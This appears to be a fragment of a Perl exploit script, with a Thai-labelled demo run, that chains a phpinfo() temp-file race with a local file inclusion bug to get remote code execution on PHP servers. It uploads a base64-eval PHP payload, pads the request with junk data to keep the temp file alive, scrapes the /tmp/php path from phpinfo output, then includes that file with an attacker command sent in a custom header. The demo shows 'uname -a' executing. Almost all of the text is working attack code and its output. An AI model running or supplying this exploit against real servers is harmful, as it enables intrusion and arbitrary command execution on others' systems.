'Content-Type: multipart/form-data; boundary='.$BOUNDARY.$CRLF; $HEADER .= 'z:'.("Z" x 3000).$CRLF; for(my $i=0; $i<30; $i++){$HEADER .= 'z'.$i.': '.$i.$CRLF;} $HEADER .= 'Content-Length: '; my $CONTENT .= '--'.$BOUNDARY.$CRLF; $CONTENT .= 'Content-Disposition: form-data; name="tfile"; filename="elif.html"'.$CRLF; $CONTENT .= 'Content-Type: text/html'.$CRLF.$CRLF; $CONTENT .= '<?@eval(base64_decode($_SERVER[HTTP_THD]));exit;?>'.$CRLF; $CONTENT .= '--'.$BOUNDARY.'--'.$CRLF; for(my $i=0; $i<40;$i++){ $CONTENT .= '--'.$BOUNDARY.$CRLF; $CONTENT .= 'Content-Disposition: form-data; name="junkfile'.$i.'"; filename="junkfile'.$i.('>' x 100000).'"'.$CRLF; $CONTENT .= 'Content-Type: text/html'.$CRLF.$CRLF; $CONTENT .= 'jumk'.$CRLF; $CONTENT .= '--'.$BOUNDARY.'--'.$CRLF; } $HEADER .= length($CONTENT).$CRLF.$CRLF.$CONTENT; print $SOCK $HEADER; while($line=<$SOCK>){ if($line =~ m#tmp_name].+(/tmp/php.+)$#) { my $tmpfile = $1; my $cookie_jar = HTTP::Cookies->new(autosave =>1, hide_cookie2=>1); my $browser = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', timeout => 8, max_redirect => 0, cookie_jar => $cookie_jar ); $browser->default_header('THD'=>$COMMAND); my $content_rce = $browser->get($LFI_URL.$tmpfile)->content; print $content_rce; exit; } } |
#########################
# ตัวอย่าง การทดลองสั่ง ‘uname -a’
#########################
pirate@BlackBuntu~/Desktop$ ./phpinfo_exploit.pl http://localhost/phpinfo.php http://localhost/lfi.php?page= "system('uname -a');"
Linux BlackBuntu 2.6.38-10-generic #44-Ubuntu SMP Thu Jun 2 21:32:22 UTC 2011 x86_64 GNU/Linux
